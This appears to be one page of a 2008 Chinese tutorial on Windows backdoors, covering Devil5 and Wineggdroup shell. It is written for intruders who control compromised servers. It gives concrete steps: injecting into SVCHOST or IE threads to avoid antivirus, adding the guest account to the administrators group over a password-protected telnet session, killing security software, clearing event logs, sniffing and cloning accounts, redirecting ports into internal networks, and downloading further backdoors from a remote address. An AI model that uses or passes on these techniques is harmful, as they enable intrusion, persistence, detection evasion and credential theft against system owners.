作者：    来源：    点击：    日期：2008-1-3 18:06:42   

　　同BITS一样，Devil5也是线程插入式的后门，和BITS不同的是它可以很方便的在GUI界面下按照自己的使用习惯定制端口和需要插入的线程，适合对系统有一定了解的使用都使用，由于是自定义插入线程，所以它更难被查杀，下面我们来看看它的使用。

　　运用举例：

　　道德使用它自带的配置程序EDITDEVIL5.EXE对后门进行常规的配置,包括控制端口、插入线程、连接密码、时间间隔等方面关键点是对插入线程的定制，一般设置成系统自带的SVCHOST，然后运行后门就可以控制了。

　　我们用TELNET连接上去，连接的格式是：TELNET *** 定制的端口，它和其他后门不同之处在于连接后没有提示的界面，每次执行程序也是分开的，必须要每次都有输入密码，比如我们丢掉了服务器和管账户，可以激活GUEST后再将GUEST加到管理员权限，记得每次执行命令后加上“>密码”就可以了：net localgroup administrators guest /add >hkfx，然后你又可以控制服务器了。

　　很明显示，同榕哥的BITS相比，DEVIL5有一些缺陷：不能通过系统自带端口通讯、执行命令比较麻烦，需要每次输入密码而且不回显示输入内容，很容易出错。但是，它有自己的优势：插入线程可以自已定制，比如设置IE的线程为插入的目标就比较难被查杀：自己提供了专门的查杀工具DELDEVIL5.exe，帮助防护者清理系统;而且它可以任意改名和绑定，使用灵活性上比BITS强……大家选择哪能款就看自己的喜好了。

　　另外，PortLess BackDoor等工具也是此类的后门，功能强大，隐蔽性稍差，大家有兴趣可以自己研究一下。

　　3.扩展后门

 

　　所谓的扩展后门，在普通意义上理解，可以看成是将非常多的功能集成到了后门里，让后门本身就可以实现很多功能，方便直接控制肉鸡或者服务器，这类的后门非常受初学者的喜爱，通常集成了文件上传/下载、系统用户检测、HTTP访问、终端安装、端口开放、启动/停止服务等功能，本身就是个小的工具包，功能强大。

　　Wineggdroup shell

　　类型：系统后门
　　使用范围：win2000/xp/2003
　　隐蔽程度：★★★★☆
　　使用难度：★★☆☆☆
　　危害程度：★★★★☆
　　查杀难度：★★★★☆

　　这个后门是扩展后门中很有代表性的一个，功能这全面让人叹为观止，它能实现如下比较有特色的功能：进程管理，可查看，杀进程(支持用进程名或PID来杀进程);注册表管现(查看，删除，增加等功能);服务管理(停止，启动，枚举，配置，删除服务等功能)端口到程序关联功能(fport);系统重启，关电源，注销等功能(reboot,poweroff,shutdown,logoff);嗅探密码功能;安装终端，修改终端端口功能;端口重定向功能(多线程，并且可限制连接者IP);HTTP服务功能(多线程，并且可限制连接者IP);Socd5代理功能(支持两种不同方式验证，可限制连接者IP);克隆账号，检测克隆账户功能(clone,checkclone);加强了的FindpassWord功能(可以得到所有登录用户，包括使用克隆账户远程登录用户密码);HTTP代理(完全匿名，支持oicq、 MSN、mirc等程序);其他辅助功能，http下载，删除日志，系统信息，恢复常用关联，枚举系统账户等。

　　当网络上刚推出这个后门的时候，非常多的人用它来替换自己原来使用的后门，一时间各处赞扬之声迭起，但多为一些普通的打捞手的心声，其实它和“后门”的原始定义是有出入的：一旦你需要实现越多的功能，那你的程序在执行、隐藏、稳定等方面就需要考虑非常多的问题，一个疏忽就会导致全盘皆败，所以不建议将此后门用在需要非常隐蔽的地方。

　　运用举例

　　在安装后门前，需要使用它自带的EditServer.exe程序对服务端进行非常详细的配置，从10个具体配置中，包括了插入线程、密码、IP登录邮件通告等方面，不难看出它的功能是非常强大的，隐蔽性也很强，下面说几个在入侵中常用的功能，相信经常玩入侵的朋友一定能发现它的强大之处：

　　Fport:列出进程到端口的列表，用于发现系统中运行程序所对应的端口，可以用来检测常见的隐蔽的后门。

　　Reboot:重启系统，如果你上传并运行了其他后门程序，并需要重启机器以便让后门正常工作，那使用这个命令吧!

　　Shell:得到一个Dos Shell,这个不多讲了，直接得到服务器或者肉鸡上的cmd shell。

　　Pskill PID或程序名：用于杀掉特定的服务，比如杀毒软件或者是防火墙。

　　Execute程序：在后台中执行程序，比如sniffer等。[url=http://ip/]http://ip/[/url]文件名 保存文件名：下载程序，直接从网上down一个后门到服务器上。

　　Installterm端口：在没有安装终端服务的win2k服务版的系统中安装终端服务，重启系统后才生效，并可以自定义连接端口，比如不用3389而用其他端口。

　　StopService/StartService:停止或者启动某个系统服务，比如telnet。

　　CleanEvent:删除系统日志。

　　Redirect:TCP数据转发，这个功能是后门程序中非常出色的一个功能，可以通过某一端口的数据转发来控制内网的机器，在渗透入侵的时候非常管用!

首页 上一页 [1] [2] [3] [4] [5]  下一页 尾页